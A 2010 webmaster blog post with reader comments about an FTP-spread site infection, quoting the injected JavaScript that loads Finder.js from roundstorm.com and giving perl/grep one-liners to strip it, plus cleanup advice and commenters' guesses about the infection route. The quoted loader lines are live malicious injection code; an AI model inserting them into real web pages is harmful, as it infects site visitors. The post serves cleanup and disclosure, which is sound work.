RoundStorm FTP Hack – Solution
This past weekend a few of my FTP accounts got hacked via a Java virus that is being spread via roundstorm.com, I posted some more info and a fix below.
-
The following code was being injected into all Javascript files found via FTP.
document.write('<s'+'cript type="text/javascript" src="http://roundstorm.com:8080/Finder.js"></scr'+'ipt>');
-
All index/home/footer & header HTML files had this code
<script type="text/javascript" src="http://roundstorm.com:8080/Finder.js"></script> <!--4561fc54d91b71ee303e54dd3da18ccf-->
-
Solution
Via shell access to your server you can run the following command:
perl -pi -w -e 's/(\n?)( ?)document.write.*ipt>.\);/ /g' `grep -ril roundstorm *` perl -pi -w -e 's/.*roundstorm.*|.*4561fc54d91b71ee303e54dd3da18ccf.*/ /g' `grep -ril 4561fc54d91b71ee303e54dd3da18ccf *`
NOTE Replace the unique identifier on the last line from “4561fc54d91b71ee303e54dd3da18ccf” to whatever is found in your html files. This command basically searches all files for the unique roundstorm identifier and removes it. This ID is going to be different for each FTP account that has been hacked.
This command finds all files infected with the roundstorm hack and remove the infected code.
After you clean up the files run a virus clean up on your computer. I used malwarebytes. Also remember to upadate all your FTP PASSWORDS and DO NOT save any FTP information on your FTP Client.
There is also another blogger reporting the same hack here: http://wpguru.co.uk/2010/07/the-drunkjeans-com-wordpress-hack-and-how-to-get-rid-of-it/
UPDATE: 07/21/2010
Other solutions:
- Restore a backup of the site. If you have cPanel or Plesk this should be easy.
- If your site is in a version control system you can simply revert all changed files.
- Nick, from our comments area below, suggested a PHP script would be more helpful for those users who do not have shell access. Let me know via the comments area if this is in high demand, I can probably devote some time to creating a script this week.
For any questions regarding this post contact us at http://tritonweb.com/contact.php
Leave a comment if you found this useful!
July 15th, 2010 at 11:52 am
I had the same thing on my website, it infected various different scripts and somehow even got in to replace and infect well protected files. It even got to some scripts that are not public. To me this suggests some kind of root level access.
I don’t know how this virus works or anything about its method or how to protect against it, but I have managed to check through 20,000 odd files and replace them with fresh copies from my backups. Mostly index.php’s, .js files and .html stuff.
July 15th, 2010 at 1:23 pm
Thanks for the info Mark. I also recently found that getting rid of this virus on the my PC is tricky. I have installed NoScript (Firefox Plugin) and completely uninstalled Java6 my computer… The sites I visit hardly used Java anyway.
July 19th, 2010 at 2:01 am
Did the virus get from your computer to your website or your website to your computer? The virus never got onto my computer thanks to Eset’s AV, it was on the website first.
I would love to know how it worked because if it got in once then it can sure as heck do it again and I doubt just changing my passwords will work.
But I have a lot of different systems so knowing which is vulnerable requires knowing how the script works. I have tried to contact various AV firms but they are all useless.
July 20th, 2010 at 7:54 am
Also have been ‘infected’. It added to all my index, js files as well as many html and php files with ‘main’ as the prefix.
Still very limited information on the web about it
July 20th, 2010 at 7:27 pm
Back…
As one who ‘dabbles’ in php, the thought came to me that as the AV big boys haven’t yet taken this problem under their wings. Perhaps a small group of talented indiviuals could write a php/asp/etc script that would run though all the files and a person’s site automatically editing out the offending code.
I know the concept is valid, however, I do not feel I am sufficiently skilled to write it. Correcting via the shell may be a bit too daunting for the average site owner. Whereas, running a simple script is some thing easily done by even a novice.
Just a thought.
Nick
July 21st, 2010 at 9:28 am
@Nick, I thought about that too but found it easier to use shell since we have access to our servers. The only flaw I see in using a PHP script is that you’ll need to properly CHMOD all the files before running the script and maybe on shared hosts the script will not be able to run for long periods of time.
Other solutions:
- restore a backup of the site. If you have cPanel or Plesk this should be easy.
- If your site is in a version control system you can simply revert all changed files.
I can probably whip up a PHP script if enough requests come in.
July 30th, 2010 at 5:46 pm
Thanks for the great advice.
I just helped to restore a clients site that was infected. It’s a nasty one and as you said was in every file and directory. We did a full site restore to fix.
But I’m curious about the details of your comment. “Delete all FTP Passwords and do not save any on your client”. Is the virus somehow grabbing passwords from the FTP Client?
I’m a Mac guy which (normally) gives me a certain level of security, and I’m using Transmit for Mac, which is a pretty decent FTP client. However my passwords are saved within Transmit. (Although they are encrypted).
I’m just wondering what kinds of hoops need to be jumped?
Thanks again!
July 31st, 2010 at 3:18 pm
Some thoughts…
Does anyone of you use phpmaker?
Does anyone has / had mywebsearch plugin installed?
regards,
Ivan
July 31st, 2010 at 3:27 pm
forget the cpanel option, I’ve had sites hacked on hosting servers not offering cpanel or plesk. In my opinion the malware resides on the pc of the webmaster.
August 3rd, 2010 at 11:14 am
@David the passwords are encrypted locally but can be easily decrypted depending on the app. Check to see if your FTP client has a setting for a “Master Password.” This should increase the security of your passwords, also if you save passwords in your browser you might want to setup a “Master Password” there too.
@Ivan I had to download and run Avast free anti-virus in Boot mode. This found several *.sys, *.tmp files that were infected. Mainly in temp and system32 folders. NoScript is really helping and uninstalling Java also didn’t hurt.